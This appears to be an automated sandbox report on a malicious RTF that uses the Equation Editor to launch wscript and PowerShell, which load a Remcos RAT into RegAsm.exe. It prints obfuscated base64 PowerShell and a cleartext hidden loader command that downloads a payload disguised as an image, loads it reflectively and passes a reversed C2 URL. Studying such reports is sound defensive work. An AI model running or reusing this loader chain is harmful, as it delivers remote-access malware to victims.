? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? 
? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process Stats: CPU usage > 49%
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 770B0000 page execute and read and write
                Source: C:\Windows\SysWOW64\wscript.exe Memory allocated: 770B0000 page execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 770B0000 page execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00254D60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0043706A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00414005
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0043E11C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_004541D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_004381E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0041F18B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00446270
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0043E34B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_004533AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0042742E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00437566
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0043E5A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_004387F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0043797E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_004339D7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0044DA49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00427AD7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0041DBF3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00427C40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00437DB3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00435EEB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0043DEED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00426E9F
                Source: ~WRF{0230E32B-C301-4FA6-B113-F550CB612E0B}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 00402093 appears 50 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 00401E65 appears 34 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 00434E70 appears 54 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 00434801 appears 41 times
                Source: xnHel.rtf, type: SAMPLE Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 8.2.powershell.exe.46deb20.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 8.2.powershell.exe.46deb20.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 8.2.powershell.exe.46deb20.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 8.2.powershell.exe.46deb20.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 8.2.powershell.exe.46deb20.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 8.2.powershell.exe.46deb20.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000008.00000002.398638126.00000000043B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 3536, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 3644, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 3644, type: MEMORYSTR Matched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: Process Memory Space: powershell.exe PID: 3644, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: RegAsm.exe PID: 3752, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: C:\Users\user\Desktop\~WRD0000.tmp, type: DROPPED Matched rule: INDICATOR_RTF_EXPLOIT_CVE_2017_8759_2 author = ditekSHen, description = detects CVE-2017-8759 weaponized RTF documents.
                Source: classification engine Classification label: mal100.rans.troj.spyw.expl.evad.winRTF@10/21@2/4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$xnHel.rtf
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-O0U3JA
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRA2D3.tmp
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seennewthingsentireworldseethethin.vbS"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................T.r.u.e.(.P.....................D........2.........................s............................................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ....................................u.e.(.P.....................D........2.........................s............................................
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File read: C:\Windows\System32\drivers\etc\hosts
                Source: xnHel.rtf ReversingLabs: Detection: 47%
                Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seennewthingsentireworldseethethin.vbS"
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? 
? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.TSONU/124/321.98.09.54//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.TSONU/124/321.98.09.54//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64win.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64cpu.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: msi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: cryptsp.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rpcrtremote.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dwmapi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: version.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: secur32.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winhttp.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: webio.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: iphlpapi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winnsi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dnsapi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: nlaapi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc6.dll
